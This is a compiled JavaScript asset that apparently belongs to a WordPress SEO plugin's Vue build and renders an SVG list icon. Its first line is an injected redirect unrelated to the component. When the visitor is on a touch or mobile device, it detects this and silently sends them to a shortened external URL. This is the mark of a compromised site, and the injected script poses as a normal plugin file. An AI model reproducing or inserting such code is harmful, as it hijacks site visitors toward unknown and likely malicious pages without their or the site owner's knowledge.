(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as t,i as r,j as e}from"./vendor-vue-ui.232c7c36.js";const s={},l={viewBox:"0 0 36 36",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-list"};function c(a,n){return t(),r("svg",l,[...n[0]||(n[0]=[e("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M34.2 0H1.8C.8 0 0 .8 0 1.8v32.4C0 35 .8 36 1.8 36h32.4c.8 0 1.8-1 1.8-1.8V1.8c0-1-1-1.8-1.8-1.8ZM12 8H8v4h4V8Zm16 0H16v4h12V8Zm0 8H16v4h12v-4Zm-12 8h12v4H16v-4Zm-8-8h4v4H8v-4Zm4 8H8v4h4v-4Zm-8 8h28V4H4v28Z",fill:"currentColor"},null,-1)])])}const p=o(s,[["render",c]]);export{p as S};
